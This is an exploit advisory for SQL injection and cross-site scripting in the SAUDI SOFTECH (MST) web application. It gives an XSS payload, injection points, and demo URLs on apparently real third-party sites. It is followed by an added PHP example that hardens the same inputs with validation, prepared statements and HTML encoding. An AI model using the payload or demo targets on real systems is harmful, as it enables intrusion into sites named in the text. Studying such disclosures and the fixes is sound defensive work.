SAUDI SOFTECH (MST) - SQL Injection / Cross Site Scripting

2016.06.06
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79, CWE-89

######################
# Exploit Title : SAUDI SOFTECH (MST) - SQL Injection / Cross Site Scripting
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.saudisoftech.com/
# Category: [ Webapps ]
# Tested on: [ Win ]
# Date: 2016/06/05
# Version : V.5.0.1
######################
#
# PoC:
# 1-1-Get SQL Injection
# Demo :
# http://www.saudiacademy.edu.sa/gallery.php?gid=4%27
# http://www.zamilshipyard.com/gallery.php?gid=2%27
#
# 1-2-Post SQL Injection
# email Parameter in Login page vulnerable
# Demo:
# http://www.zamilshipyard.com/panel/index.php
#
# 2-Cross Site Scripting
# Search Box vulnerable to XSS
# Payload = <ScRiPt >prompt("Persian Hack Team")</ScRiPt>
# Demo :
# http://www.btech-sa.com/search.php
# http://www.speetech.net/search.php
# http://www.madicc.org/search.php
#
######################
# Discovered by : Mojtaba MobhaM & T3NZOG4N & FireKernel
# Greetz : Milad Hacking & JOK3R & All Iranian Hackers And All Persian Hack Team Members
# Homepage : persian-team.ir
######################
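
Added example, not part of the original advisory and not the vendor's code: a hardened form of the three inputs the advisory names (the `gid` GET parameter, the login `email` POST parameter, and the search box). The function names, table names and column names are assumptions, since the vendor's schema is not on the page; the demo uses a constructed in-memory SQLite database.

```php
<?php
declare(strict_types=1);

// Hypothetical handlers for the three inputs named in the advisory.
// Table and column names are assumptions; the vendor's schema is not on the page.

/** gallery.php?gid=... : accept only a positive integer, then bind it. */
function fetchGallery(PDO $db, string $rawGid): array
{
    $gid = filter_var($rawGid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($gid === false) {
        return [];  // a value with a trailing quote never reaches the database
    }
    $stmt = $db->prepare('SELECT id, title FROM gallery_items WHERE gallery_id = :gid');
    $stmt->bindValue(':gid', $gid, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

/** panel/index.php login: the email value is bound, never concatenated. */
function checkLogin(PDO $db, string $email, string $password): bool
{
    $stmt = $db->prepare('SELECT password_hash FROM admins WHERE email = :email');
    $stmt->execute([':email' => $email]);
    $hash = $stmt->fetchColumn();
    return is_string($hash) && password_verify($password, $hash);
}

/** search.php: encode the term for the HTML context it is echoed into. */
function renderSearchHeading(string $term): string
{
    $safe = htmlspecialchars($term, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<h2>Results for "' . $safe . '"</h2>';
}

// Constructed demo data in an in-memory SQLite database (requires pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE gallery_items (id INTEGER PRIMARY KEY, gallery_id INTEGER, title TEXT)');
$db->exec("INSERT INTO gallery_items (gallery_id, title) VALUES (4, 'Campus')");
$db->exec('CREATE TABLE admins (email TEXT, password_hash TEXT)');

var_dump(count(fetchGallery($db, '4')));    // well-formed id is looked up
var_dump(count(fetchGallery($db, "4'")));   // malformed id is rejected by validation
var_dump(checkLogin($db, "a@example.com' OR '1'='1", 'x')); // compared as a literal string
echo renderSearchHeading('<ScRiPt >prompt(1)</ScRiPt>'), PHP_EOL; // markup is entity-encoded
```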

